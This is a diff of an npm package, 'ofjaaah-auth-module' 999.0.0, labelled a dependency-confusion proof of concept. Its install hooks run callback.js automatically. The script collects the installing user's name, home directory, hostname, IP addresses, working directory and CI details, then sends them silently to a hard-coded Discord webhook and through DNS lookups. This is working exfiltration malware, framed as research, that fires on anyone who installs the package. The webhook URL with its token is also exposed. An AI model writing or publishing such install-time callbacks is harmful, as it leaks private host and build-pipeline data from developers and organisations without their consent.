ofjaaah-auth-module 999.0.0

package/callback.js

@@ -0,0 +1,249 @@
+#!/usr/bin/env node
+/**
+ * Dependency Confusion PoC Callback
+ * Author: OFJAAAH
+ * Generated: 2026-01-17T05:32:49.656Z
+ *
+ * This script sends a callback to verify package installation
+ * Collects: IP, User, Directory, Hostname for proof of concept
+ * FOR AUTHORIZED SECURITY TESTING ONLY
+ */
+
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const { execSync } = require('child_process');
+
+const CALLBACK_URL = 'Discord Webhook';
+const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1433563083011395705/VYmvJKeyHmyJ4knuZKUzHiXz4p3H5gxJucqDAPEPE-GCu2xS9Qr16wAiVgC0o5ll7I_y';
+const PACKAGE_NAME = 'ofjaaah-auth-module';
+
+// Get network interfaces to find IP
+function getLocalIP() {
+  try {
+    const interfaces = os.networkInterfaces();
+    for (const name of Object.keys(interfaces)) {
+      for (const iface of interfaces[name]) {
+        if (iface.family === 'IPv4' && !iface.internal) {
+          return iface.address;
+        }
+      }
+    }
+  } catch (e) {}
+  return 'unknown';
+}
+
+// Get external IP (optional - may fail in restricted networks)
+async function getExternalIP() {
+  return new Promise((resolve) => {
+    https.get('https://api.ipify.org?format=json', { timeout: 3000 }, (res) => {
+      let data = '';
+      res.on('data', chunk => data += chunk);
+      res.on('end', () => {
+        try {
+          resolve(JSON.parse(data).ip);
+        } catch (e) {
+          resolve(null);
+        }
+      });
+    }).on('error', () => resolve(null));
+  });
+}
+
+// Collect system info
+function collectSystemInfo() {
+  const info = {
+    // Package info
+    package: PACKAGE_NAME,
+    timestamp: new Date().toISOString(),
+
+    // User info
+    user: os.userInfo().username,
+    uid: os.userInfo().uid,
+    gid: os.userInfo().gid,
+    homedir: os.userInfo().homedir,
+    shell: os.userInfo().shell,
+
+    // System info
+    hostname: os.hostname(),
+    platform: os.platform(),
+    arch: os.arch(),
+    release: os.release(),
+    type: os.type(),
+
+    // Directory info
+    cwd: process.cwd(),
+
+    // Network info
+    localIP: getLocalIP(),
+
+    // Node info
+    nodeVersion: process.version,
+    npmVersion: process.env.npm_package_version || 'unknown',
+
+    // CI/CD Detection
+    isCI: !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || process.env.TRAVIS || process.env.CIRCLECI || process.env.BUILDKITE),
+    ciEnvironment: detectCIEnvironment(),
+
+    // NPM info
+    npmLifecycle: process.env.npm_lifecycle_event || '',
+    npmPackageName: process.env.npm_package_name || '',
+
+    // Additional context
+    env: {
+      CI: process.env.CI || '',
+      GITHUB_ACTIONS: process.env.GITHUB_ACTIONS || '',
+      GITHUB_REPOSITORY: process.env.GITHUB_REPOSITORY || '',
+      GITHUB_ACTOR: process.env.GITHUB_ACTOR || '',
+      GITLAB_CI: process.env.GITLAB_CI || '',
+      GITLAB_USER_LOGIN: process.env.GITLAB_USER_LOGIN || '',
+      JENKINS_URL: process.env.JENKINS_URL || '',
+      BUILD_NUMBER: process.env.BUILD_NUMBER || '',
+      TRAVIS: process.env.TRAVIS || '',
+      CIRCLECI: process.env.CIRCLECI || '',
+      BUILDKITE: process.env.BUILDKITE || ''
+    }
+  };
+
+  return info;
+}
+
+function detectCIEnvironment() {
+  if (process.env.GITHUB_ACTIONS) return 'GitHub Actions';
+  if (process.env.GITLAB_CI) return 'GitLab CI';
+  if (process.env.JENKINS_URL) return 'Jenkins';
+  if (process.env.TRAVIS) return 'Travis CI';
+  if (process.env.CIRCLECI) return 'CircleCI';
+  if (process.env.BUILDKITE) return 'Buildkite';
+  if (process.env.CI) return 'Generic CI';
+  return 'Local Machine';
+}
+
+async function sendCallback() {
+  const systemInfo = collectSystemInfo();
+
+  // Try to get external IP
+  const externalIP = await getExternalIP();
+  if (externalIP) {
+    systemInfo.externalIP = externalIP;
+  }
+
+  const data = JSON.stringify(systemInfo);
+
+  const url = new URL(CALLBACK_URL);
+  const options = {
+    hostname: url.hostname,
+    port: url.port || (url.protocol === 'https:' ? 443 : 80),
+    path: url.pathname + (url.search || ''),
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(data),
+      'User-Agent': 'dependency-confusion-poc/ofjaaah-auth-module',
+      'X-PoC-Package': 'ofjaaah-auth-module',
+      'X-PoC-Author': 'OFJAAAH'
+    },
+    timeout: 10000
+  };
+
+  const protocol = url.protocol === 'https:' ? https : http;
+
+  const req = protocol.request(options, (res) => {
+    console.log('[PoC] Callback sent - Status:', res.statusCode);
+  });
+
+  req.on('error', (e) => {
+    // Silently fail
+  });
+
+  req.on('timeout', () => {
+    req.destroy();
+  });
+
+  req.write(data);
+  req.end();
+}
+
+// DNS exfiltration for restricted networks
+function sendDnsCallback() {
+  try {
+    const dns = require('dns');
+    const info = {
+      p: PACKAGE_NAME.substring(0, 15),
+      u: os.userInfo().username.substring(0, 10),
+      h: os.hostname().substring(0, 10),
+      t: Date.now()
+    };
+    const encoded = Buffer.from(JSON.stringify(info))
+      .toString('base64')
+      .replace(/[+/=]/g, '')
+      .substring(0, 50);
+
+    const dnsHost = encoded + '.' + new URL(CALLBACK_URL).hostname;
+    dns.resolve(dnsHost, () => {});
+  } catch (e) {}
+}
+
+// Send to Discord Webhook
+async function sendDiscordCallback() {
+  if (!DISCORD_WEBHOOK || DISCORD_WEBHOOK === '') return;
+
+  const systemInfo = collectSystemInfo();
+  const externalIP = await getExternalIP();
+
+  const embed = {
+    title: '🎯 Dependency Confusion - Callback Received!',
+    description: 'A package installation triggered the PoC callback.',
+    color: 0xFF0000,
+    fields: [
+      { name: '📦 Package', value: PACKAGE_NAME, inline: true },
+      { name: '👤 User', value: systemInfo.user || 'N/A', inline: true },
+      { name: '🖥️ Hostname', value: systemInfo.hostname || 'N/A', inline: true },
+      { name: '🌐 Local IP', value: systemInfo.localIP || 'N/A', inline: true },
+      { name: '🌍 External IP', value: externalIP || 'N/A', inline: true },
+      { name: '💻 Platform', value: (systemInfo.platform + ' ' + systemInfo.arch) || 'N/A', inline: true },
+      { name: '📁 Directory', value: systemInfo.cwd || 'N/A', inline: false },
+      { name: '🏠 Home', value: systemInfo.homedir || 'N/A', inline: false },
+      { name: '🔧 Node Version', value: systemInfo.nodeVersion || 'N/A', inline: true },
+      { name: '🏭 CI Environment', value: systemInfo.ciEnvironment || 'Local', inline: true },
+    ],
+    footer: { text: 'Dependency Confusion Hunter by OFJAAAH' },
+    timestamp: new Date().toISOString()
+  };
+
+  const payload = JSON.stringify({
+    embeds: [embed]
+  });
+
+  try {
+    const url = new URL(DISCORD_WEBHOOK);
+    const options = {
+      hostname: url.hostname,
+      port: 443,
+      path: url.pathname + url.search,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(payload)
+      },
+      timeout: 10000
+    };
+
+    const req = https.request(options, (res) => {
+      console.log('[PoC] Discord callback sent - Status:', res.statusCode);
+    });
+
+    req.on('error', () => {});
+    req.write(payload);
+    req.end();
+  } catch (e) {}
+}
+
+// Execute callbacks
+(async () => {
+  try {
+    await sendCallback();
+    await sendDiscordCallback();
+    sendDnsCallback();
+  } catch (e) {}
+})();

package/index.js

@@ -0,0 +1,15 @@
+/**
+ * ofjaaah-auth-module
+ * Security Research PoC - Dependency Confusion Hunter
+ * Author: OFJAAAH
+ *
+ * This package was published as part of authorized security research
+ * to demonstrate dependency confusion vulnerabilities.
+ */
+
+module.exports = {
+  name: 'ofjaaah-auth-module',
+  version: '999.0.0',
+  poc: true,
+  author: 'OFJAAAH'
+};

package/package.json

@@ -0,0 +1,17 @@
+{
+  "name": "ofjaaah-auth-module",
+  "version": "999.0.0",
+  "description": "Security research PoC - Dependency Confusion Hunter by OFJAAAH",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node callback.js",
+    "postinstall": "node callback.js"
+  },
+  "keywords": [
+    "security",
+    "research",
+    "poc"
+  ],
+  "author": "OFJAAAH - Security Research",
+  "license": "MIT"
+}